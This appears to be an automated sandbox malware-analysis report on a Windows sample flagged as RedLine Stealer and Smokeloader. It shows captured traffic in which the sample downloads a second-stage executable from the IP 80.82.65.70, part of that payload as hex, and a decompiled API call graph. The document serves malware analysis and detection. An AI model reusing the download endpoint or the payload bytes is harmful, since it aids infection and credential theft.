                                        Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                        Dec 12, 2024 23:09:04.324621916 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                        Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                        Dec 12, 2024 23:09:04.324631929 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                        Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                        Dec 12, 2024 23:09:04.324644089 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                        Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                        Dec 12, 2024 23:09:04.324908972 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                        Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                        Dec 12, 2024 23:09:04.324928999 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                        Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                        Dec 12, 2024 23:09:04.324939966 CET556INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                        Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                        Dec 12, 2024 23:09:04.445004940 CET1236INData Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00
                                        Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                        Dec 12, 2024 23:09:05.215993881 CET392OUTGET /soft/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: s
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:09:05.948359013 CET1236INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:09:05 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Disposition: attachment; filename="soft";
                                        Content-Length: 1502720
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: application/octet-stream
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:17:08:03
                                        Start date:12/12/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x400000
                                        File size:1'948'672 bytes
                                        MD5 hash:DD44780D69D56D86BD3BE9D6CA0F69A9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:17:09:07
                                        Start date:12/12/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7020 -s 1704
                                        Imagebase:0xe70000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:4.1%
                                          Dynamic/Decrypted Code Coverage:10.6%
                                          Signature Coverage:57%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:23
                                          execution_graph 38650 401940 38651 4019af InternetSetFilePointer InternetReadFile 38650->38651 38652 401a50 _unexpected 38651->38652 38653 401a7a HttpQueryInfoA 38652->38653 38654 401aa3 CoCreateInstance 38653->38654 38655 401dea 38653->38655 38654->38655 38657 401adc 38654->38657 38719 4099d7 38655->38719 38657->38655 38683 402730 38657->38683 38658 401e13 38660 401b2c 38661 401c05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38660->38661 38662 401e19 38660->38662 38670 401d8c __InternalCxxFrameHandler 38661->38670 38699 409b4a 38661->38699 38726 40cfaf 38662->38726 38666 401c3b 38667 409b4a 41 API calls 38666->38667 38666->38670 38671 401cf3 __InternalCxxFrameHandler 38666->38671 38673 401cc7 _unexpected 38667->38673 38668 401d7b 38716 40d09d 14 API calls __dosmaperr 38668->38716 38670->38655 38671->38668 38671->38670 38674 401d88 _unexpected 38671->38674 38672 401d80 38718 40cf9f 39 API calls ___std_exception_copy 38672->38718 38673->38671 38677 401d2c 38673->38677 38678 401d1f 38673->38678 38674->38670 38717 40d09d 14 API calls __dosmaperr 38674->38717 38677->38671 38714 40d09d 14 API calls __dosmaperr 38677->38714 38713 40d09d 14 API calls __dosmaperr 38678->38713 38680 401d24 38715 40cf9f 39 API calls ___std_exception_copy 38680->38715 38684 402800 38683->38684 38685 40274f 38683->38685 38733 4015d0 43 API calls 3 library calls 38684->38733 38687 40275b __InternalCxxFrameHandler 38685->38687 38688 402783 38685->38688 38691 4027c7 38685->38691 38692 4027be 38685->38692 38687->38660 38731 401530 41 API calls 4 library calls 38688->38731 38689 402805 38734 401530 41 API calls 3 library calls 38689->38734 38698 40279f __InternalCxxFrameHandler 38691->38698 38732 401530 41 API calls 4 library calls 38691->38732 38692->38688 38692->38689 38694 402796 38695 40cfaf 39 API calls 38694->38695 38694->38698 38697 40280f 38695->38697 38698->38660 38703 409b0c 38699->38703 38701 409b2b 38701->38666 38703->38701 38704 409b2d 38703->38704 38737 411672 EnterCriticalSection LeaveCriticalSection _unexpected 38703->38737 38738 40fb0d 38703->38738 38705 401530 Concurrency::cancel_current_task 38704->38705 38707 409b37 38704->38707 38735 40af40 RaiseException 38705->38735 38745 40af40 RaiseException 38707->38745 38709 40154c 38736 40acf1 40 API calls 2 library calls 38709->38736 38710 40a549 38712 401573 38712->38666 38713->38680 38714->38680 38715->38671 38716->38672 38717->38672 38718->38670 38720 4099e0 IsProcessorFeaturePresent 38719->38720 38721 4099df 38719->38721 38723 409a27 38720->38723 38721->38658 38748 4099ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38723->38748 38725 409b0a 38725->38658 38749 40ceeb 39 API calls ___std_exception_copy 38726->38749 38728 40cfbe 38750 40cfcc 11 API calls _unexpected 38728->38750 38730 40cfcb 38731->38694 38732->38698 38733->38689 38734->38694 38735->38709 38736->38712 38737->38703 38743 413c79 _unexpected 38738->38743 38739 413cb7 38747 40d09d 14 API calls __dosmaperr 38739->38747 38741 413ca2 RtlAllocateHeap 38742 413cb5 38741->38742 38741->38743 38742->38703 38743->38739 38743->38741 38746 411672 EnterCriticalSection LeaveCriticalSection _unexpected 38743->38746 38745->38710 38746->38743 38747->38742 38748->38725 38749->38728 38750->38730 38751 cec95e 38752 cec96d 38751->38752 38755 ced0fe 38752->38755 38760 ced119 38755->38760 38756 ced122 CreateToolhelp32Snapshot 38757 ced13e Module32First 38756->38757 38756->38760 38758 ced14d 38757->38758 38759 cec976 38757->38759 38762 cecdbd 38758->38762 38760->38756 38760->38757 38763 cecde8 38762->38763 38764 cecdf9 VirtualAlloc 38763->38764 38765 cece31 38763->38765 38764->38765 38765->38765 38766 40a071 38767 40a07d __FrameHandler3::FrameUnwindToState 38766->38767 38794 409dd1 38767->38794 38769 40a084 38770 40a1d7 38769->38770 38782 40a0ae ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 38769->38782 38822 40a54a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _unexpected 38770->38822 38772 40a1de 38823 41066b 38772->38823 38776 40a1ec 38777 40a0cd 38778 40a14e 38802 40a665 38778->38802 38782->38777 38782->38778 38818 410645 39 API calls 2 library calls 38782->38818 38795 409dda 38794->38795 38827 40a2ac IsProcessorFeaturePresent 38795->38827 38797 409de6 38828 40b73d 10 API calls 2 library calls 38797->38828 38799 409deb 38800 409def 38799->38800 38829 40b75c 7 API calls 2 library calls 38799->38829 38800->38769 38830 40b530 38802->38830 38805 40a154 38806 412248 38805->38806 38832 41812d 38806->38832 38808 40a15c 38811 408770 38808->38811 38809 412251 38809->38808 38838 4183dd 39 API calls 38809->38838 38812 402730 43 API calls 38811->38812 38813 4087a5 38812->38813 38814 402730 43 API calls 38813->38814 38815 4087ca 38814->38815 38841 405a30 38815->38841 38818->38778 38822->38772 41310 41049f 38823->41310 38826 41062f 21 API calls _unexpected 38826->38776 38827->38797 38828->38799 38829->38800 38831 40a678 GetStartupInfoW 38830->38831 38831->38805 38833 418136 38832->38833 38837 418168 38832->38837 38839 41295d 39 API calls 3 library calls 38833->38839 38835 418159 38840 417f38 49 API calls 3 library calls 38835->38840 38837->38809 38838->38809 38839->38835 38840->38837 39272 4107e2 GetSystemTimeAsFileTime 38841->39272 38843 405a7f 39274 4106a2 38843->39274 38846 402730 43 API calls 38851 405aba 38846->38851 38847 402730 43 API calls 38879 405c80 __InternalCxxFrameHandler _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38847->38879 38848 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38848->38847 38848->38879 38849 40cfaf 39 API calls 38849->38879 38851->38848 40438 4025a0 41 API calls 38851->40438 38855 409b4a 41 API calls 38855->38879 38856 4061c5 39293 406c20 38856->39293 38858 4061ec 39303 402430 38858->39303 38862 4061fc 39307 402360 38862->39307 38866 406210 38867 4062e5 38866->38867 38868 406218 38866->38868 40476 406ec0 53 API calls 2 library calls 38867->40476 38872 406288 38868->38872 38873 40622b 38868->38873 38871 4062ea 38877 402430 43 API calls 38871->38877 40471 406db0 53 API calls 2 library calls 38872->40471 40466 406ca0 53 API calls 2 library calls 38873->40466 38874 406192 Sleep 38874->38879 38881 4062fa 38877->38881 38878 406230 38883 402430 43 API calls 38878->38883 38879->38849 38879->38855 38879->38856 38879->38874 38882 402730 43 API calls 38879->38882 38887 40619e 38879->38887 38898 406c0b 38879->38898 38899 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38879->38899 39277 4107b2 38879->39277 39281 403a90 38879->39281 40439 4025a0 41 API calls 38879->40439 40440 409c85 6 API calls 38879->40440 40441 409f97 42 API calls 38879->40441 40442 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38879->40442 40443 4092d0 38879->40443 40448 401e20 38879->40448 38880 40628d 38884 402430 43 API calls 38880->38884 38885 402360 39 API calls 38881->38885 38882->38879 38886 406240 38883->38886 38888 40629d 38884->38888 38890 40630e 38885->38890 40467 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38886->40467 40464 408c10 43 API calls 38887->40464 40472 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38888->40472 38895 4063e4 38890->38895 38896 406316 38890->38896 38893 4062a6 38900 402360 39 API calls 38893->38900 38894 4061aa 38901 402360 39 API calls 38894->38901 40485 407260 53 API calls 2 library calls 38895->40485 40477 406f40 53 API calls 2 library calls 38896->40477 38897 406249 38903 402360 39 API calls 38897->38903 40541 403c20 38898->40541 38899->38874 38906 4062ae 38900->38906 38907 4061b2 38901->38907 38909 406251 38903->38909 40473 406e40 53 API calls 2 library calls 38906->40473 38913 402360 39 API calls 38907->38913 38908 40631b 38920 402430 43 API calls 38908->38920 40468 406d30 53 API calls 2 library calls 38909->40468 38911 4063e9 38918 402430 43 API calls 38911->38918 38916 4061ba 38913->38916 38915 4062b3 38924 402430 43 API calls 38915->38924 40465 4017d0 CoUninitialize 38916->40465 38917 406256 38923 402430 43 API calls 38917->38923 38921 4063f9 38918->38921 38922 40632b 38920->38922 38931 402360 39 API calls 38921->38931 40478 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38922->40478 38927 406266 38923->38927 38928 4062c3 38924->38928 38926 406334 38929 402360 39 API calls 38926->38929 40469 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38927->40469 40474 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38928->40474 38933 40633c 38929->38933 38935 40640d 38931->38935 40479 406fc0 53 API calls 2 library calls 38933->40479 38934 40626f 38938 402360 39 API calls 38934->38938 38939 4064ce 38935->38939 40486 4072e0 53 API calls 2 library calls 38935->40486 38936 4062cc 38940 402360 39 API calls 38936->38940 38942 406277 38938->38942 40494 407600 53 API calls 2 library calls 38939->40494 38945 4062d4 38940->38945 38941 406341 38951 402430 43 API calls 38941->38951 40470 408c10 43 API calls 38942->40470 40475 408c10 43 API calls 38945->40475 38947 40641a 38954 402430 43 API calls 38947->38954 38948 4064d8 38955 402430 43 API calls 38948->38955 38950 406283 38952 40686e 38950->38952 40532 402330 43 API calls 38950->40532 38953 406351 38951->38953 39315 401770 38952->39315 40480 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38953->40480 38959 40642a 38954->38959 38960 4064e8 38955->38960 40487 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38959->40487 38968 402360 39 API calls 38960->38968 38961 406881 39319 408380 38961->39319 38962 40635a 38965 402360 39 API calls 38962->38965 38970 406362 38965->38970 38966 406433 38967 402360 39 API calls 38966->38967 38971 40643b 38967->38971 38972 4064fc 38968->38972 38969 40688a 38980 402430 43 API calls 38969->38980 40481 407040 53 API calls 2 library calls 38970->40481 40488 407360 53 API calls 2 library calls 38971->40488 38975 4065e3 38972->38975 40495 407680 53 API calls 2 library calls 38972->40495 40505 407a20 53 API calls 2 library calls 38975->40505 38976 406367 38984 402430 43 API calls 38976->38984 38978 406440 38987 402430 43 API calls 38978->38987 38983 40689d 38980->38983 38981 4065ed 38989 402430 43 API calls 38981->38989 38982 406509 38991 402430 43 API calls 38982->38991 39329 408300 38983->39329 38986 406377 38984->38986 38995 402360 39 API calls 38986->38995 38990 406450 38987->38990 38988 4068a8 38998 402430 43 API calls 38988->38998 38992 4065fd 38989->38992 40489 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38990->40489 38994 406519 38991->38994 39006 402360 39 API calls 38992->39006 40496 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38994->40496 39000 40638b 38995->39000 38996 406459 39001 402360 39 API calls 38996->39001 38999 4068bb 38998->38999 39339 408260 38999->39339 39004 4063ac 39000->39004 39005 40638f 39000->39005 39007 406461 39001->39007 39002 406522 39008 402360 39 API calls 39002->39008 40483 407150 53 API calls 2 library calls 39004->40483 40482 4070d0 53 API calls 2 library calls 39005->40482 39011 406611 39006->39011 40490 4073e0 53 API calls 2 library calls 39007->40490 39013 40652a 39008->39013 39009 4068c6 39024 402430 43 API calls 39009->39024 39017 406693 39011->39017 39018 406615 39011->39018 40497 407700 53 API calls 2 library calls 39013->40497 39015 4063b1 39028 402430 43 API calls 39015->39028 39016 406394 39030 402430 43 API calls 39016->39030 40512 407c40 53 API calls 2 library calls 39017->40512 40506 407ab0 53 API calls 2 library calls 39018->40506 39019 406466 39027 402430 43 API calls 39019->39027 39023 40652f 39032 402430 43 API calls 39023->39032 39029 4068d9 39024->39029 39025 406698 39038 402430 43 API calls 39025->39038 39026 40661a 39039 402430 43 API calls 39026->39039 39031 406476 39027->39031 39033 4063c1 39028->39033 39349 408d60 39029->39349 39035 4063a4 39030->39035 39046 402360 39 API calls 39031->39046 39036 40653f 39032->39036 39048 402360 39 API calls 39033->39048 40531 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39035->40531 40498 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39036->40498 39044 4066a8 39038->39044 39040 40662a 39039->39040 40507 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39040->40507 39057 402360 39 API calls 39044->39057 39052 40648a 39046->39052 39047 406548 39053 402360 39 API calls 39047->39053 39054 4063d5 39048->39054 39049 406906 39357 408e70 39049->39357 39050 406855 39050->38950 39056 402360 39 API calls 39050->39056 39051 406633 39058 402360 39 API calls 39051->39058 39059 406498 39052->39059 39060 40648e 39052->39060 39061 406550 39053->39061 39054->38950 40484 4071e0 53 API calls 2 library calls 39054->40484 39056->38950 39063 4066bc 39057->39063 39064 40663b 39058->39064 40492 4074f0 53 API calls 2 library calls 39059->40492 40491 407470 53 API calls 2 library calls 39060->40491 40499 407780 53 API calls 2 library calls 39061->40499 39070 4066c0 39063->39070 39071 40673e 39063->39071 40508 407b30 53 API calls 2 library calls 39064->40508 39069 408dc0 43 API calls 39075 406933 39069->39075 40513 407cd0 53 API calls 2 library calls 39070->40513 40519 407e50 53 API calls 2 library calls 39071->40519 39073 406555 39084 402430 43 API calls 39073->39084 39074 40649d 39085 402430 43 API calls 39074->39085 39079 408e70 43 API calls 39075->39079 39078 406640 39087 402430 43 API calls 39078->39087 39080 406948 39079->39080 39083 408dc0 43 API calls 39080->39083 39081 406743 39091 402430 43 API calls 39081->39091 39082 4066c5 39092 402430 43 API calls 39082->39092 39086 406960 39083->39086 39088 406565 39084->39088 39089 4064ad 39085->39089 39090 402360 39 API calls 39086->39090 39093 406650 39087->39093 40500 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39088->40500 39101 402360 39 API calls 39089->39101 39095 40696e 39090->39095 39096 406753 39091->39096 39097 4066d5 39092->39097 40509 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39093->40509 39102 402360 39 API calls 39095->39102 39112 402360 39 API calls 39096->39112 40514 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39097->40514 39099 40656e 39100 402360 39 API calls 39099->39100 39105 406576 39100->39105 39106 4064c1 39101->39106 39107 406979 39102->39107 39104 406659 39109 402360 39 API calls 39104->39109 40501 407800 53 API calls 2 library calls 39105->40501 39106->38950 40493 407580 53 API calls 2 library calls 39106->40493 39111 402360 39 API calls 39107->39111 39108 4066de 39113 402360 39 API calls 39108->39113 39114 406661 39109->39114 39117 406984 39111->39117 39118 406767 39112->39118 39119 4066e6 39113->39119 40510 407bc0 53 API calls 2 library calls 39114->40510 39115 40657b 39131 402430 43 API calls 39115->39131 39122 402360 39 API calls 39117->39122 39123 40676b 39118->39123 39124 4067be 39118->39124 40515 407d50 53 API calls 2 library calls 39119->40515 39121 406666 39134 402430 43 API calls 39121->39134 39128 40698f 39122->39128 40520 407ee0 53 API calls 2 library calls 39123->40520 40525 408060 53 API calls 2 library calls 39124->40525 39126 4066eb 39137 402430 43 API calls 39126->39137 39133 402360 39 API calls 39128->39133 39130 406770 39140 402430 43 API calls 39130->39140 39135 40658b 39131->39135 39132 4067c3 39143 402430 43 API calls 39132->39143 39136 40699a 39133->39136 39138 406676 39134->39138 39148 402360 39 API calls 39135->39148 39139 402360 39 API calls 39136->39139 39141 4066fb 39137->39141 40511 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39138->40511 39144 4069a5 39139->39144 39145 406780 39140->39145 40516 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39141->40516 39149 4067d3 39143->39149 39150 402360 39 API calls 39144->39150 40521 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39145->40521 39147 40667f 39154 402360 39 API calls 39147->39154 39155 40659f 39148->39155 39164 402360 39 API calls 39149->39164 39151 4069b0 39150->39151 39156 402360 39 API calls 39151->39156 39153 406704 39158 402360 39 API calls 39153->39158 39154->38950 39159 4065a8 39155->39159 40502 407890 53 API calls 2 library calls 39155->40502 39200 4069bf 39156->39200 39157 406789 39161 402360 39 API calls 39157->39161 39162 40670c 39158->39162 40503 407910 53 API calls 2 library calls 39159->40503 39166 406791 39161->39166 40517 407dd0 53 API calls 2 library calls 39162->40517 39168 4067e7 39164->39168 39165 4065b2 39174 402430 43 API calls 39165->39174 40522 407f60 53 API calls 2 library calls 39166->40522 39168->38950 40526 4080e0 53 API calls 2 library calls 39168->40526 39170 406711 39176 402430 43 API calls 39170->39176 39172 406796 39178 402430 43 API calls 39172->39178 39173 4067f0 39180 402430 43 API calls 39173->39180 39175 4065c2 39174->39175 39185 402360 39 API calls 39175->39185 39179 406721 39176->39179 39177 406a1e Sleep 39177->39200 39181 4067a6 39178->39181 40518 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39179->40518 39184 406800 39180->39184 40523 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39181->40523 39183 40672a 39188 402360 39 API calls 39183->39188 40527 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39184->40527 39190 4065d6 39185->39190 39187 4067af 39192 402360 39 API calls 39187->39192 39188->38950 39190->38950 40504 4079a0 53 API calls 2 library calls 39190->40504 39191 402430 43 API calls 39191->39200 39194 4067b7 39192->39194 39193 406809 39195 402360 39 API calls 39193->39195 40524 407fe0 53 API calls 2 library calls 39194->40524 39198 406811 39195->39198 40528 408160 53 API calls 2 library calls 39198->40528 39200->39177 39200->39191 39201 406a27 39200->39201 39205 406a16 39200->39205 39202 402360 39 API calls 39201->39202 39204 406a2f 39202->39204 39203 406816 39211 402430 43 API calls 39203->39211 39360 408c40 39204->39360 39208 402360 39 API calls 39205->39208 39206 4067bc 39209 402430 43 API calls 39206->39209 39208->39177 39209->39035 39210 406a40 39213 408c40 43 API calls 39210->39213 39212 406826 39211->39212 40529 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39212->40529 39215 406a59 39213->39215 39217 408c40 43 API calls 39215->39217 39216 40682f 39218 402360 39 API calls 39216->39218 39219 406a6c 39217->39219 39220 406837 39218->39220 39377 404f50 39219->39377 40530 4081e0 53 API calls 2 library calls 39220->40530 39223 406a81 39224 406aa1 39223->39224 39225 408c40 43 API calls 39223->39225 40533 408410 53 API calls 2 library calls 39224->40533 39227 406a9c 39225->39227 39860 403d20 39227->39860 39228 406aa9 39230 402430 43 API calls 39228->39230 39231 406ab9 39230->39231 39232 402360 39 API calls 39231->39232 39233 406acd 39232->39233 39234 406b70 39233->39234 39235 401770 41 API calls 39233->39235 40536 408580 53 API calls 2 library calls 39234->40536 39237 406ae8 39235->39237 40534 4084a0 53 API calls 2 library calls 39237->40534 39238 406b75 39241 402430 43 API calls 39238->39241 39240 406af1 39243 402430 43 API calls 39240->39243 39242 406b88 39241->39242 39244 402360 39 API calls 39242->39244 39247 406b01 39243->39247 39245 406b9f 39244->39245 39245->38898 39246 406ba3 39245->39246 40537 4086f0 53 API calls 2 library calls 39246->40537 39250 406b37 39247->39250 39251 406b28 Sleep 39247->39251 39249 406bb0 39254 402430 43 API calls 39249->39254 39255 402430 43 API calls 39250->39255 39251->39247 39252 406b35 39251->39252 39253 406b59 39252->39253 39256 402360 39 API calls 39253->39256 39257 406bbf 39254->39257 39258 406b4e 39255->39258 39259 406b61 39256->39259 40538 408670 53 API calls 2 library calls 39257->40538 39261 402360 39 API calls 39258->39261 40535 4017d0 CoUninitialize 39259->40535 39261->39253 39263 406bd3 39264 402430 43 API calls 39263->39264 39265 406be2 39264->39265 40539 408610 53 API calls __Init_thread_footer 39265->40539 39267 406bf0 39268 402430 43 API calls 39267->39268 39269 406bff 39268->39269 40540 4058d0 242 API calls 5 library calls 39269->40540 39271 406c08 39271->38898 39273 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39272->39273 39273->38843 40544 4128a2 GetLastError 39274->40544 39278 4107ca 39277->39278 39279 4107c0 39277->39279 39278->38879 40588 4106b4 43 API calls 2 library calls 39279->40588 39282 403ad1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39281->39282 39283 408c40 43 API calls 39282->39283 39289 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39282->39289 39290 403c17 39282->39290 39283->39282 39284 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39285 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39284->39285 39287 403c13 39285->39287 39287->38879 39288 403b6d 39288->39284 39288->39290 39289->39284 39289->39290 40589 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39289->40589 39291 40cfaf 39 API calls 